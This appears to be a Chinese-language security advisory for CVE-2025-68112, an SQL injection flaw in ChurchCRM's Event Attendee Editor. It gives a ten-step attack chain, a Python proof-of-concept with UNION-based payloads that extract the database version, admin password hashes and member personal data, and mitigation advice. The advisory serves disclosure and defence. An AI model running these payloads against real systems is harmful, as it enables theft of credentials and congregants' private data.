CVE-2025-68112 ChurchCRM Event Attendee Editor SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-68112

漏洞类型

SQL注入

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一款开源的教堂管理系统，广泛应用于各类宗教组织用于管理成员信息、活动安排、财务记录等敏感数据。该系统在全球范围内被众多教堂和宗教机构使用，存储着大量个人隐私信息和财务数据。CVE-2025-68112是一个严重的安全漏洞，存在于ChurchCRM的Event Attendee Editor（活动参与者编辑器）模块中。漏洞影响6.5.3之前的所有版本，允许经过低权限认证的用户在系统中执行任意SQL命令。由于教堂管理系统通常包含成员的个人身份信息、捐赠记录、家庭联系方式等高度敏感数据，一旦该漏洞被利用，攻击者可以完全控制数据库，窃取管理员凭证，获取所有成员的个人隐私信息，甚至可能导致整个系统被完全接管。该漏洞的CVSS评分高达9.6，属于严重级别，对使用受影响版本ChurchCRM的组织构成重大安全威胁。

技术细节

该SQL注入漏洞位于ChurchCRM的活动参与者编辑功能模块中。漏洞产生的根本原因是该模块在处理用户输入时未对特殊SQL字符进行充分的过滤和转义，直接将用户可控的参数拼接到SQL查询语句中。攻击者只需要拥有一个低权限的ChurchCRM用户账户，即可利用此漏洞。通过在Event Attendee Editor的相关参数中注入精心构造的SQL payloads，攻击者能够绕过前端的输入限制，执行任意数据库操作。攻击者可以首先通过UNION SELECT语句提取数据库版本、表结构等敏感信息，然后逐步获取用户表中的管理员账户和密码哈希值。利用SQL注入，攻击者还可以通过LOAD_FILE等函数读取服务器上的敏感配置文件，甚至通过INTO OUTFILE等语法将恶意代码写入服务器，实现远程代码执行。整个攻击过程不需要任何用户交互，攻击者可在短时间内完成数据库的完全控制。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者首先识别目标组织使用的ChurchCRM系统版本，确认版本号低于6.5.3

STEP 2

步骤2

获取初始访问权限：攻击者通过社会工程学、弱口令爆破或利用其他低危漏洞获取一个低权限的ChurchCRM用户账户

STEP 3

步骤3

定位漏洞点：攻击者导航至Event Attendee Editor模块，识别可注入的参数点（主要是EventID等GET/POST参数）

STEP 4

步骤4

构建恶意Payload：攻击者构造UNION-based或Boolean-based SQL注入payload，绕过输入过滤

STEP 5

步骤5

数据库指纹识别：通过注入测试语句获取数据库类型、版本、当前用户权限等关键信息

STEP 6

步骤6

枚举数据库结构：利用注入漏洞获取数据库表名、列名等元数据，定位存储用户凭证和敏感信息的表

STEP 7

步骤7

提取管理员凭证：针对用户表执行SQL查询，提取管理员账户的用户名和密码哈希值

STEP 8

步骤8

密码破解与权限提升：对获取的密码哈希进行离线破解，获取管理员访问权限

STEP 9

步骤9

数据窃取：利用管理员权限导出所有成员的个人身份信息、财务记录、捐赠历史等敏感数据

STEP 10

步骤10

持久化与横向移动：可能通过数据库写入功能植入后门，或利用获取的凭证尝试入侵其他关联系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# ChurchCRM CVE-2025-68112 SQL Injection PoC
# Target: ChurchCRM < 6.5.3 Event Attendee Editor
# CVSS 9.6 (Critical)

import requests
import sys

target = input("Enter target URL (e.g., http://churchcrm.local): ")

# Step 1: Login with low-privilege account
session = requests.Session()
login_url = f"{target}/Login.php"
login_data = {
    "UserName": "attacker",
    "Password": "password",
    "Submit": "Login"
}

response = session.post(login_url, data=login_data)
print(f"[+] Login attempt: {response.status_code}")

# Step 2: Extract database version
vuln_url = f"{target}/EventAttendeeEditor.php"
payload_db_version = "1' UNION SELECT 1,@@version,3,4,5-- "
params = {"EventID": payload_db_version}

response = session.get(vuln_url, params=params)
print(f"[+] Database version extraction attempted")
print(f"[+] Response length: {len(response.text)}")

# Step 3: Extract admin credentials
payload_admin = "1' UNION SELECT 1,CONCAT(username,':',password),3,4,5 FROM user_tbl WHERE role='admin' LIMIT 1-- "
params = {"EventID": payload_admin}

response = session.get(vuln_url, params=params)
print(f"[+] Admin credential extraction attempted")

# Step 4: Extract all member data
payload_members = "1' UNION SELECT 1,CONCAT(firstname,'|',lastname,'|',email,'|',phone),3,4,5 FROM person_per-- "
params = {"EventID": payload_members}

response = session.get(vuln_url, params=params)
print(f"[+] Member data extraction attempted")
print(f"[!] Check response for leaked data")

print("\n[*] PoC completed. Check application logs and response content.")
print("[*] Recommendation: Upgrade to ChurchCRM 6.5.3 or later immediately.")

影响范围

ChurchCRM < 6.5.3

防御指南

临时缓解措施

在无法立即进行版本升级的情况下，可采取以下临时缓解措施：首先，限制Event Attendee Editor功能的访问权限，仅允许受信任的管理员访问；其次，在Web应用防火墙层面配置SQL注入防护规则，拦截包含UNION、SELECT、INSERT等SQL关键字的可疑请求；第三，加强用户账户安全策略，强制使用强密码并定期更换；第四，启用详细的数据库操作审计日志，实时监控异常查询行为；第五，对现有用户账户进行全面排查，禁用或重置所有可疑账户的凭据。需要强调的是，这些临时措施不能完全消除SQL注入风险，最根本的解决方案仍然是尽快升级到修复版本6.5.3。